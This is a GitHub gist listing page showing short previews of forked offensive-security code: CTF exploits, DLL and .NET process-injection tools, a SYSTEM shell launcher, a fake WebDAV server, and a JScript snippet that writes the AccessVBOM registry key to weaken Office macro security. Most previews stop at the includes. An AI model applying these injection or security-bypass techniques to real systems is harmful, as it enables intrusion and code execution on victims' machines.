y11en
/ scrdec18-VC8.exe
Created
June 16, 2017 02:03
— forked from bcse/scrdec18-VC8.exe
Windows Script Decoder 1.8 (Decoding JScript.Encoded)
y11en
/ Some interest
Created
June 30, 2017 09:37
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| Hi~ |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <html> | |
| <head> | |
| <script> | |
| var objExcel = new ActiveXObject("Excel.Application"); | |
| objExcel.Visible = false; | |
| var WshShell = new ActiveXObject("WScript.Shell"); | |
| var Application_Version = objExcel.Version;//Auto-Detect Version | |
| var strRegPath = "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\" + Application_Version + "\\Excel\\Security\\AccessVBOM"; | |
| WshShell.RegWrite(strRegPath, 1, "REG_DWORD"); | |
| var objWorkbook = objExcel.Workbooks.Add(); |
y11en
/ SystemCMD.cpp
Created
October 24, 2018 03:36
— forked from masthoon/SystemCMD.cpp
Launch SYSTEM CMD in user current session (from a service)
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #include "stdafx.h" | |
| #include <windows.h> | |
| #include <Winbase.h> | |
| #include <Wtsapi32.h> | |
| #include <Userenv.h> | |
| #include <malloc.h> | |
| #pragma comment(lib, "Wtsapi32.lib") | |
| #pragma comment(lib, "Userenv.lib") |
y11en
/ fakewebdav.py
Created
October 24, 2018 03:37
— forked from masthoon/fakewebdav.py
Basic WebDAV server
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| import os, binascii | |
| from flask import Flask, Response, abort | |
| def random_etag(): | |
| return "1000-" + binascii.b2a_hex(os.urandom(6)) | |
| app = Flask(__name__) | |
| PORT = 80 | |
| DLL_ETAG = random_etag() |
y11en
/ main.cpp
Created
October 20, 2019 10:36
— forked from martinisoft/main.cpp
List files in directory recursively
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #include <sys/types.h> | |
| #include <dirent.h> | |
| #include <errno.h> | |
| #include <vector> | |
| #include <string> | |
| #include <iostream> | |
| using namespace std; | |
| // getdir - returns vector of files in all directories of directory |
y11en
/ WCTF_2018_searchme_exploit.cpp
Created
December 30, 2019 10:13
— forked from j00ru/WCTF_2018_searchme_exploit.cpp
WCTF 2018 "searchme" exploit by Mateusz "j00ru" Jurczyk
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| // WCTF 2018 "searchme" task exploit | |
| // | |
| // Author: Mateusz "j00ru" Jurczyk | |
| // Date: 6 July 2018 | |
| // Tested on: Windows 10 1803 (10.0.17134.165) | |
| // | |
| // See also: https://j00ru.vexillium.org/2018/07/exploiting-a-windows-10-pagedpool-off-by-one/ | |
| #include <Windows.h> | |
| #include <winternl.h> | |
| #include <ntstatus.h> |
y11en
/ Insomnihack_Teaser_2017_winworld_exploit.py
Created
December 30, 2019 10:14
— forked from j00ru/Insomnihack_Teaser_2017_winworld_exploit.py
Insomni'hack Teaser 2017 "winworld" exploit by Mateusz "j00ru" Jurczyk
y11en
/ dllinjshim.cpp
Created
September 9, 2020 03:32
— forked from w4kfu/dllinjshim.cpp
DLL Injection via Shim
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| /* | |
| -------- dllinjshim.cpp -------- | |
| > cl /Fe:dllinjshim.exe dllinjshim.cpp | |
| > dllinjshim.exe | |
| > sdbinst moo.sdb | |
| /!\ On Windows 10 there is a new function `SdbIsKnownShimDll` called | |
| in `SdbGetDllPath` which will check the DLL name against the following list: |
y11en
/ DInjectQueuerAPC.cs
Created
November 23, 2020 03:55
— forked from jfmaes/DInjectQueuerAPC.cs
.NET Process injection in a new process with QueueUserAPC using D/invoke - compatible with gadgettojscript
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| using System; | |
| using System.Diagnostics; | |
| using System.IO; | |
| using System.Runtime.InteropServices; | |
| namespace DinjectorWithQUserAPC | |
| { | |
| public class Program |
OlderNewer